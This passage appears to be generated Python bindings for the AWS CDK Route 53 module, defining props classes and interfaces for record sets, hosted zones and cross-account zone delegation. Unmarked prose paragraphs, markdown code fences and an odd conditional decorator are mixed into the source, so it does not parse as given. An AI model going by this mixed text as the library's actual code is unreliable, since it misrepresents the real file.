self._values["comment"] = comment
if failover is not None:
self._values["failover"] = failover
if geo_location is not None:
self._values["geo_location"] = geo_location
if health_check_id is not None:
self._values["health_check_id"] = health_check_id
if hosted_zone_id is not None:
self._values["hosted_zone_id"] = hosted_zone_id
if hosted_zone_name is not None:
self._values["hosted_zone_name"] = hosted_zone_name
if multi_value_answer is not None:
self._values["multi_value_answer"] = multi_value_answer
if region is not None:
self._values["region"] = region
if resource_records is not None:
self._values["resource_records"] = resource_records
if set_identifier is not None:
self._values["set_identifier"] = set_identifier
if ttl is not None:
self._values["ttl"] = ttl
if weight is not None:
self._values["weight"] = weight
@builtins.property
def name(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def type(self) -> builtins.str:
'''``AWS::Route53::RecordSet.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-type
'''
result = self._values.get("type")
assert result is not None, "Required property 'type' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def alias_target(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.AliasTargetProperty]]:
'''``AWS::Route53::RecordSet.AliasTarget``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-aliastarget
'''
result = self._values.get("alias_target")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.AliasTargetProperty]], result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def failover(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Failover``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-failover
'''
result = self._values.get("failover")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def geo_location(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.GeoLocationProperty]]:
'''``AWS::Route53::RecordSet.GeoLocation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-geolocation
'''
result = self._values.get("geo_location")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.GeoLocationProperty]], result)
@builtins.property
def health_check_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HealthCheckId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-healthcheckid
'''
result = self._values.get("health_check_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzonename
'''
result = self._values.get("hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def multi_value_answer(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``AWS::Route53::RecordSet.MultiValueAnswer``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-multivalueanswer
'''
result = self._values.get("multi_value_answer")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def region(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-region
'''
result = self._values.get("region")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def resource_records(self) -> typing.Optional[typing.List[builtins.str]]:
'''``AWS::Route53::RecordSet.ResourceRecords``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-resourcerecords
'''
result = self._values.get("resource_records")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def set_identifier(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.SetIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-setidentifier
'''
result = self._values.get("set_identifier")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSet.TTL``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-ttl
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def weight(self) -> typing.Optional[jsii.Number]:
'''``AWS::Route53::RecordSet.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-weight
'''
result = self._values.get("weight")
return typing.cast(typing.Optional[jsii.Number], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnRecordSetProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
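# Illustrative usage (placeholder values): props for a standalone TXT record.
# TXT record values must be wrapped in double quotes inside the Python string,
# per Route 53's record data format.
#
#   txt_props = CfnRecordSetProps(
#       name="_verify.example.com.",
#       type="TXT",
#       hosted_zone_name="example.com.",
#       resource_records=['"token=abc123"'],
#       ttl="300",
#   )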
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CommonHostedZoneProps",
jsii_struct_bases=[],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
},
)
class CommonHostedZoneProps:
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''Common properties to create a Route 53 hosted zone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CommonHostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class CrossAccountZoneDelegationRecord(
aws_cdk.core.Construct,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CrossAccountZoneDelegationRecord",
):
'''A Cross Account Zone Delegation record.'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
delegated_zone: "IHostedZone",
delegation_role: aws_cdk.aws_iam.IRole,
parent_hosted_zone_id: typing.Optional[builtins.str] = None,
parent_hosted_zone_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param delegated_zone: The zone to be delegated.
:param delegation_role: The delegation role in the parent account.
:param parent_hosted_zone_id: The hosted zone id in the parent account. Default: - no zone id
:param parent_hosted_zone_name: The hosted zone name in the parent account. Default: - no zone name
:param ttl: The resource record cache time to live (TTL). Default: Duration.days(2)
'''
props = CrossAccountZoneDelegationRecordProps(
delegated_zone=delegated_zone,
delegation_role=delegation_role,
parent_hosted_zone_id=parent_hosted_zone_id,
parent_hosted_zone_name=parent_hosted_zone_name,
ttl=ttl,
)
jsii.create(CrossAccountZoneDelegationRecord, self, [scope, id, props])
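# Illustrative usage (assumed names, not part of the generated bindings):
# creating the delegation record from within a child-account stack.
# ``sub_zone`` (an ``IHostedZone``) and ``delegation_role`` (an IAM role in
# the parent account) are assumed to exist in the surrounding app.
#
#   CrossAccountZoneDelegationRecord(
#       self, "Delegation",
#       delegated_zone=sub_zone,
#       delegation_role=delegation_role,
#       parent_hosted_zone_name="example.com",
#   )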
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CrossAccountZoneDelegationRecordProps",
jsii_struct_bases=[],
name_mapping={
"delegated_zone": "delegatedZone",
"delegation_role": "delegationRole",
"parent_hosted_zone_id": "parentHostedZoneId",
"parent_hosted_zone_name": "parentHostedZoneName",
"ttl": "ttl",
},
)
class CrossAccountZoneDelegationRecordProps:
def __init__(
self,
*,
delegated_zone: "IHostedZone",
delegation_role: aws_cdk.aws_iam.IRole,
parent_hosted_zone_id: typing.Optional[builtins.str] = None,
parent_hosted_zone_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Construction properties for a CrossAccountZoneDelegationRecord.
:param delegated_zone: The zone to be delegated.
:param delegation_role: The delegation role in the parent account.
:param parent_hosted_zone_id: The hosted zone id in the parent account. Default: - no zone id
:param parent_hosted_zone_name: The hosted zone name in the parent account. Default: - no zone name
:param ttl: The resource record cache time to live (TTL). Default: Duration.days(2)
'''
self._values: typing.Dict[str, typing.Any] = {
"delegated_zone": delegated_zone,
"delegation_role": delegation_role,
}
if parent_hosted_zone_id is not None:
self._values["parent_hosted_zone_id"] = parent_hosted_zone_id
if parent_hosted_zone_name is not None:
self._values["parent_hosted_zone_name"] = parent_hosted_zone_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def delegated_zone(self) -> "IHostedZone":
'''The zone to be delegated.'''
result = self._values.get("delegated_zone")
assert result is not None, "Required property 'delegated_zone' is missing"
return typing.cast("IHostedZone", result)
@builtins.property
def delegation_role(self) -> aws_cdk.aws_iam.IRole:
'''The delegation role in the parent account.'''
result = self._values.get("delegation_role")
assert result is not None, "Required property 'delegation_role' is missing"
return typing.cast(aws_cdk.aws_iam.IRole, result)
@builtins.property
def parent_hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''The hosted zone id in the parent account.
:default: - no zone id
'''
result = self._values.get("parent_hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def parent_hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''The hosted zone name in the parent account.
:default: - no zone name
'''
result = self._values.get("parent_hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.days(2)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CrossAccountZoneDelegationRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.HostedZoneAttributes",
jsii_struct_bases=[],
name_mapping={"hosted_zone_id": "hostedZoneId", "zone_name": "zoneName"},
)
class HostedZoneAttributes:
def __init__(
self,
*,
hosted_zone_id: builtins.str,
zone_name: builtins.str,
) -> None:
'''Reference to a hosted zone.
:param hosted_zone_id: Identifier of the hosted zone.
:param zone_name: Name of the hosted zone.
'''
self._values: typing.Dict[str, typing.Any] = {
"hosted_zone_id": hosted_zone_id,
"zone_name": zone_name,
}
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''Identifier of the hosted zone.'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def zone_name(self) -> builtins.str:
'''Name of the hosted zone.'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneAttributes(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
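The ``HostedZoneAttributes`` class above follows the jsii "struct" pattern used throughout this module: keyword-only constructor arguments are stored in a plain ``_values`` dict, and each property re-checks required keys with an ``assert`` on access. A minimal stand-alone sketch of that pattern (``MiniZoneAttributes`` is a hypothetical stand-in, not part of aws-cdk):

```python
import typing


class MiniZoneAttributes:
    """Simplified stand-in mimicking the generated struct pattern."""

    def __init__(self, *, hosted_zone_id: str, zone_name: str) -> None:
        # Required values go straight into a plain dict, as in the
        # generated classes.
        self._values: typing.Dict[str, typing.Any] = {
            "hosted_zone_id": hosted_zone_id,
            "zone_name": zone_name,
        }

    @builtins_property if False else property
    def hosted_zone_id(self) -> str:
        result = self._values.get("hosted_zone_id")
        assert result is not None, "Required property 'hosted_zone_id' is missing"
        return typing.cast(str, result)

    def __eq__(self, rhs: typing.Any) -> bool:
        # Value equality: two structs are equal iff their dicts are equal.
        return isinstance(rhs, self.__class__) and rhs._values == self._values


attrs = MiniZoneAttributes(
    hosted_zone_id="Z23ABC4XYZL05B", zone_name="example.com."
)
```

Because equality compares the underlying dicts, two structs built from the same values compare equal even though they are distinct objects.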
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.HostedZoneProps",
jsii_struct_bases=[CommonHostedZoneProps],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
"vpcs": "vpcs",
},
)
class HostedZoneProps(CommonHostedZoneProps):
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
vpcs: typing.Optional[typing.Sequence[aws_cdk.aws_ec2.IVpc]] = None,
) -> None:
'''Properties of a new hosted zone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
:param vpcs: A VPC that you want to associate with this hosted zone. When you specify this property, a private hosted zone will be created. You can associate additional VPCs with this private zone using ``addVpc(vpc)``. Default: public (no VPCs associated)
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
if vpcs is not None:
self._values["vpcs"] = vpcs
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
result = self._values.get("query_logs_log_group_arn")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def vpcs(self) -> typing.Optional[typing.List[aws_cdk.aws_ec2.IVpc]]:
'''A VPC that you want to associate with this hosted zone.
When you specify
this property, a private hosted zone will be created.
You can associate additional VPCs to this private zone using ``addVpc(vpc)``.
:default: public (no VPCs associated)
'''
result = self._values.get("vpcs")
return typing.cast(typing.Optional[typing.List[aws_cdk.aws_ec2.IVpc]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.HostedZoneProviderProps",
jsii_struct_bases=[],
name_mapping={
"domain_name": "domainName",
"private_zone": "privateZone",
"vpc_id": "vpcId",
},
)
class HostedZoneProviderProps:
def __init__(
self,
*,
domain_name: builtins.str,
private_zone: typing.Optional[builtins.bool] = None,
vpc_id: typing.Optional[builtins.str] = None,
) -> None:
'''Zone properties for looking up the Hosted Zone.
:param domain_name: The zone domain, e.g. example.com.
:param private_zone: Whether the zone that is being looked up is a private hosted zone. Default: false
:param vpc_id: Specifies the ID of the VPC associated with a private hosted zone. If a VPC ID is provided and privateZone is false, no results will be returned and an error will be raised. Default: - No VPC ID
'''
self._values: typing.Dict[str, typing.Any] = {
"domain_name": domain_name,
}
if private_zone is not None:
self._values["private_zone"] = private_zone
if vpc_id is not None:
self._values["vpc_id"] = vpc_id
@builtins.property
def domain_name(self) -> builtins.str:
'''The zone domain, e.g. example.com.'''
result = self._values.get("domain_name")
assert result is not None, "Required property 'domain_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def private_zone(self) -> typing.Optional[builtins.bool]:
'''Whether the zone that is being looked up is a private hosted zone.
:default: false
'''
result = self._values.get("private_zone")
return typing.cast(typing.Optional[builtins.bool], result)
@builtins.property
def vpc_id(self) -> typing.Optional[builtins.str]:
'''Specifies the ID of the VPC associated with a private hosted zone.
If a VPC ID is provided and privateZone is false, no results will be returned
and an error will be raised.
:default: - No VPC ID
'''
result = self._values.get("vpc_id")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HostedZoneProviderProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
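Each ``@jsii.data_type`` decorator above carries a ``name_mapping`` that pairs the Python snake_case property names with the camelCase names used on the jsii/TypeScript side (e.g. ``"vpc_id": "vpcId"``). A small illustrative sketch of that translation (``to_camel`` is a hypothetical helper, not an aws-cdk or jsii API):

```python
def to_camel(snake: str) -> str:
    """Translate a snake_case name to the camelCase form used in name_mapping."""
    head, *rest = snake.split("_")
    # First word stays lowercase; each following word is capitalized.
    return head + "".join(word.capitalize() for word in rest)
```

For example, ``to_camel("query_logs_log_group_arn")`` yields ``"queryLogsLogGroupArn"``, matching the mapping declared on ``HostedZoneProps``.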
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IAliasRecordTarget")
class IAliasRecordTarget(typing_extensions.Protocol):
'''Classes that are valid alias record targets, like CloudFront distributions and load balancers, should implement this interface.'''
@jsii.member(jsii_name="bind")
def bind(
self,
record: "IRecordSet",
zone: typing.Optional["IHostedZone"] = None,
) -> AliasRecordTargetConfig:
'''Return hosted zone ID and DNS name, usable for Route53 alias targets.
:param record: -
:param zone: -
'''
...
class _IAliasRecordTargetProxy:
'''Classes that are valid alias record targets, like CloudFront distributions and load balancers, should implement this interface.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IAliasRecordTarget"
@jsii.member(jsii_name="bind")
def bind(
self,
record: "IRecordSet",
zone: typing.Optional["IHostedZone"] = None,
) -> AliasRecordTargetConfig:
'''Return hosted zone ID and DNS name, usable for Route53 alias targets.
:param record: -
:param zone: -
'''
return typing.cast(AliasRecordTargetConfig, jsii.invoke(self, "bind", [record, zone]))
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IAliasRecordTarget).__jsii_proxy_class__ = lambda : _IAliasRecordTargetProxy
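``IAliasRecordTarget`` is a structural protocol: any class exposing a compatible ``bind(record, zone)`` method can serve as an alias target. A hedged sketch of a conforming shape, using simplified stand-in types (``FakeConfig`` and ``StaticAliasTarget`` are illustrative only, not the real aws-cdk classes; the hosted zone ID shown is the well-known global CloudFront one):

```python
import typing


class FakeConfig(typing.NamedTuple):
    """Simplified stand-in for AliasRecordTargetConfig."""

    hosted_zone_id: str
    dns_name: str


class StaticAliasTarget:
    """Returns a fixed hosted zone ID / DNS name from bind()."""

    def __init__(self, hosted_zone_id: str, dns_name: str) -> None:
        self._config = FakeConfig(hosted_zone_id, dns_name)

    def bind(
        self, record: typing.Any, zone: typing.Any = None
    ) -> FakeConfig:
        # Real implementations would derive these from the bound record/zone;
        # this sketch just hands back the stored pair.
        return self._config


target = StaticAliasTarget("Z2FDTNDATAQYW2", "d111111abcdef8.cloudfront.net")
```

The same ``bind`` signature is what the ``_IAliasRecordTargetProxy`` above forwards to over jsii.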
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IHostedZone")
class IHostedZone(aws_cdk.core.IResource, typing_extensions.Protocol):
'''Imported or created hosted zone.'''
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneArn")
def hosted_zone_arn(self) -> builtins.str:
'''ARN of this hosted zone, such as arn:${Partition}:route53:::hostedzone/${Id}.
:attribute: true
'''
...
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''ID of this hosted zone, such as "Z23ABC4XYZL05B".
:attribute: true
'''
...
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneName")
def zone_name(self) -> builtins.str:
'''FQDN of this hosted zone.'''
...
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneNameServers")
def hosted_zone_name_servers(self) -> typing.Optional[typing.List[builtins.str]]:
'''Returns the set of name servers for the specific hosted zone. For example: ns1.example.com.
This attribute will be undefined for private hosted zones or hosted zones imported from another stack.
:attribute: true
'''
...
class _IHostedZoneProxy(
jsii.proxy_for(aws_cdk.core.IResource) # type: ignore[misc]
):
'''Imported or created hosted zone.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IHostedZone"
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneArn")
def hosted_zone_arn(self) -> builtins.str:
'''ARN of this hosted zone, such as arn:${Partition}:route53:::hostedzone/${Id}.
:attribute: true
'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneArn"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''ID of this hosted zone, such as "Z23ABC4XYZL05B".
:attribute: true
'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneName")
def zone_name(self) -> builtins.str:
'''FQDN of this hosted zone.'''
return typing.cast(builtins.str, jsii.get(self, "zoneName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneNameServers")
def hosted_zone_name_servers(self) -> typing.Optional[typing.List[builtins.str]]:
'''Returns the set of name servers for the specific hosted zone. For example: ns1.example.com.
This attribute will be undefined for private hosted zones or hosted zones imported from another stack.
:attribute: true
'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "hostedZoneNameServers"))
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IHostedZone).__jsii_proxy_class__ = lambda : _IHostedZoneProxy
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IPrivateHostedZone")
class IPrivateHostedZone(IHostedZone, typing_extensions.Protocol):
'''Represents a Route 53 private hosted zone.'''
pass
class _IPrivateHostedZoneProxy(
jsii.proxy_for(IHostedZone) # type: ignore[misc]
):
'''Represents a Route 53 private hosted zone.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IPrivateHostedZone"
pass
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IPrivateHostedZone).__jsii_proxy_class__ = lambda : _IPrivateHostedZoneProxy
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IPublicHostedZone")
class IPublicHostedZone(IHostedZone, typing_extensions.Protocol):
'''Represents a Route 53 public hosted zone.'''
pass
class _IPublicHostedZoneProxy(
jsii.proxy_for(IHostedZone) # type: ignore[misc]
):
'''Represents a Route 53 public hosted zone.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IPublicHostedZone"
pass
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IPublicHostedZone).__jsii_proxy_class__ = lambda : _IPublicHostedZoneProxy
@jsii.interface(jsii_type="@aws-cdk/aws-route53.IRecordSet")
class IRecordSet(aws_cdk.core.IResource, typing_extensions.Protocol):
'''A record set.'''
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="domainName")
def domain_name(self) -> builtins.str:
'''The domain name of the record.'''
...
class _IRecordSetProxy(
jsii.proxy_for(aws_cdk.core.IResource) # type: ignore[misc]
):
'''A record set.'''
__jsii_type__: typing.ClassVar[str] = "@aws-cdk/aws-route53.IRecordSet"
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="domainName")
def domain_name(self) -> builtins.str:
'''The domain name of the record.'''
return typing.cast(builtins.str, jsii.get(self, "domainName"))
# Adding a "__jsii_proxy_class__(): typing.Type" function to the interface
typing.cast(typing.Any, IRecordSet).__jsii_proxy_class__ = lambda : _IRecordSetProxy
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.MxRecordValue",
jsii_struct_bases=[],
name_mapping={"host_name": "hostName", "priority": "priority"},
)
class MxRecordValue:
def __init__(self, *, host_name: builtins.str, priority: jsii.Number) -> None:
'''Properties for a MX record value.
:param host_name: The mail server host name.
:param priority: The priority.
'''
self._values: typing.Dict[str, typing.Any] = {
"host_name": host_name,
"priority": priority,
}
@builtins.property
def host_name(self) -> builtins.str:
'''The mail server host name.'''
result = self._values.get("host_name")
assert result is not None, "Required property 'host_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def priority(self) -> jsii.Number:
'''The priority.'''
result = self._values.get("priority")
assert result is not None, "Required property 'priority' is missing"
return typing.cast(jsii.Number, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "MxRecordValue(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.PrivateHostedZoneProps",
jsii_struct_bases=[CommonHostedZoneProps],
name_mapping={
"zone_name": "zoneName",
"comment": "comment",
"query_logs_log_group_arn": "queryLogsLogGroupArn",
"vpc": "vpc",
},
)
class PrivateHostedZoneProps(CommonHostedZoneProps):
def __init__(
self,
*,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
vpc: aws_cdk.aws_ec2.IVpc,
) -> None:
'''Properties to create a Route 53 private hosted zone.
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
:param vpc: A VPC that you want to associate with this hosted zone. Private hosted zones must be associated with at least one VPC. You can associate additional VPCs using ``addVpc(vpc)``.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone_name": zone_name,
"vpc": vpc,
}
if comment is not None:
self._values["comment"] = comment
if query_logs_log_group_arn is not None:
self._values["query_logs_log_group_arn"] = query_logs_log_group_arn
@builtins.property
def zone_name(self) -> builtins.str:
'''The name of the domain.
For resource record types that include a domain
name, specify a fully qualified domain name.
'''
result = self._values.get("zone_name")
assert result is not None, "Required property 'zone_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''Any comments that you want to include about the hosted zone.
:default: none
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def query_logs_log_group_arn(self) -> typing.Optional[builtins.str]:
'''The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to.
:default: disabled
'''
